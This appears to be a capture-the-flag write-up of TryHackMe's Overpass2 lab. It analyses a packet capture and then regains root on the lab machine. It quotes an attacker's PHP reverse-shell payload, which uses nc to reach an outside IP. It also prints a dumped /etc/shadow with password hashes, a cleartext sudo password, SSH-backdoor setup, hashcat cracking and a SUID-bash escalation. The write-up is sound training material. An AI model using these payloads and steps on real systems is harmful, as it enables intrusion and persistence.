Table of contents
Overpass2 is the seventh machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.
PCAP analysis
That is an unusual type of machine for me. We got the .pcap
file with the network dump.
There are few ways to work with .pcap
files.
If you work with .pcap
files occasionally, you are probably using the Wireshark
.
Download the .pcap
file to your system and open it with Wireshark
.
It might look overwhelming, but it not so hard to get used to it after all.
If you never worked with .pcap
files before - it is a format for capturing the network traffic. The first packets will be placed at the top, and you can scroll down the main window to see other packets.
One of the main features of the Wireshark
is the ability to follow streams
. That will transform the content of the file into a more readable format.
Wireshark
has tons of features, you should explore it!
The interesting part for us started from the POST
request to the /development/upload.php
page. You can use the Follow HTTP stream
feature to read details.
We can find this command in the body of the POST
request:
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
The attacker is spawning the reverse shell to the IP address 192.168.170.145
on the port 4242
.
We can also notice that the attacker is using nc
as a communication point, and we know that nc
transferring all data as a clear text. That means we will be able to read everything that happened on the machine, including all commands, provided passwords, etc.
You can scroll the dump a bit and follow another stream started from packet number 32. It’s a TCP
packet, so you can use the Follow TCP Stream
feature of the Wireshark
.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
The first thing that the attacker did - upgrade the shell to Fully Interactive TTY
with python
.
The next thing that we can use later is the password for user james
right in the stream (it was transferred in a clear text, remember?).
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
User james may run the following commands on overpass-production:
(ALL : ALL) ALL
We can also see that the attacker has the dump of /etc/shadow
james@overpass-production:~$ sudo cat /etc/shadow
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
Feel free to crack those hashes! wink
The attacker also established a ssh
backdoor:
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
That’s all we need to know.
Analyze the code
It’s a good idea to clone the repo and look around.
The file main.go
contains the original hash for the backdoor and hardcoded salt.
From the .pcap
file we know that the attacker used 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
hash, and from the repo we know that hardcoded salt is 1c362db832f3f864c8c2fe05f2002a05
. Now you can combine it in the format hash:salt
, and crack it!
The syntax for hashcat
, for instance. You can use other tools if you want.
hashcat -m 1710 -a 0 -o password.txt hash.txt /usr/share/wordlists/rockyou.txt
Get back in!
Now we have everything that might be needed to exploit the machine one more time.
As we already know all details about the backdoor, so we can use it as a shortcut and not re-exploit the machine from the scratch.
Note that ssh
is running not on default port 22
.
ssh -p 2222 james@10.10.147.82
Use the password that you just cracked to login.
PrivEsc
Privilege escalation is simple this time.
Let’s look around:
james@overpass-production:/home/james$ ls -la
total 1136
drwxr-xr-x 7 james james 4096 Jul 22 03:40 .
drwxr-xr-x 7 root root 4096 Jul 21 18:08 ..
lrwxrwxrwx 1 james james 9 Jul 21 18:14 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
drwx------ 2 james james 4096 Jul 21 00:36 .cache
drwx------ 3 james james 4096 Jul 21 00:36 .gnupg
drwxrwxr-x 3 james james 4096 Jul 22 03:35 .local
-rw------- 1 james james 51 Jul 21 17:45 .overpass
-rw-r--r-- 1 james james 807 Apr 4 2018 .profile
-rw-r--r-- 1 james james 0 Jul 21 00:37 .sudo_as_admin_successful
-rwsr-sr-x 1 root root 1113504 Jul 22 02:57 .suid_bash
drwxrwxr-x 3 james james 4096 Jul 22 03:35 ssh-backdoor
-rw-rw-r-- 1 james james 38 Jul 22 03:40 user.txt
drwxrwxr-x 7 james james 4096 Jul 21 01:37 www
There is a hidden .suid_bash
binary with the SUID
bit!
You can run it in order to get root, but keep in mind that you will need to specify the -p
flag to allow the SUID
bit to affect your privileges.
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
Takeaway
The ability to analyze dumps and logs can be priceless
The whole process of going through this machine is like reading a writeup, you can learn a lot from it.